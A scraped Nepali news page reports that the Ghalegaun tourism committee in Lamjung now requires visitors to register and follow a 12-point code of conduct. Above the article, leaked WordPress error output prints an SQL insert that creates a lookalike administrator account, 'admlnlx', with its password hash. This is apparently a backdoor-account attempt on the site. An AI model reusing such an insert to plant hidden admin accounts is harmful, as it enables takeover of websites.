WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGy1LvVsOHEC4uA23tf1XZAq5tIo/r.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 05:37:51', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
लेगाउँमा आउने पर्यटकले अब आचारसंहिता पालना गर्नुपर्ने – Gaule Khabar

लेगाउँमा आउने पर्यटकले अब आचारसंहिता पालना गर्नुपर्ने

लेगाउँमा आउने पर्यटकले अब आचारसंहिता पालना गर्नुपर्ने

बेँसीसहर (लमजुङ) ,माघ २४-

सार्क राष्ट्रमै नमुना मानिएको घलेगाउँमा आउने पर्यटकले अब आचारसंहिता पालना गर्नुपर्ने भएको छ । घलेगाउँ पर्यटन विकास समितिले गाउँमा आउने पर्यटकका लागि १२ बुँदे आचारसंहिता बनाएको हो । सो आचारसंहितामा गाउँमा आउने सबै पर्यटकले पहिले स्थानीय समितिमा नाम दर्ता गराउनुपर्ने हुन्छ ।

नाम दर्ता गराएसँगै समितिले पाहुनाको स्वागतसहित व्यवस्थापन गर्छ । पर्यटकले स्थानीय उत्पादन बाहेक गाउँमा उपलब्ध नहुने कुनैपनि कुरा माग गर्न पाउँदैनन् । स्थानीयवासीको क्षमताभन्दा बाहिरको कुनै पनि चिज लेनदेन गर्न नपाइने पनि आचारसंहितामा उल्लेख छ । बाल दुव्र्यव्यवहार, बाल तथा महिला बेचबिखन, यौनजन्य दुव्र्यवहार, लागुऔषध सेवन लगायतका क्रियाकलाप निषेध गरिएको छ । पर्यटकले स्थानीय समुदायमा कुनै असर गर्ने क्रियाकलाप गर्न नपाउने कुरा उल्लेख छ ।

स्थानीय कला, संस्कृति र सस्कारका साथै स्थानीय पर्यावरणमा असरपुग्ने कुनै पनि क्रियाकलाप गर्न पर्यटकलाई निषेध गरिएको छ भने उनीहरुले तोकिएका नियम पालना गर्नुपर्ने पनि आचारसंहितामा उल्लेख छ ।- रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका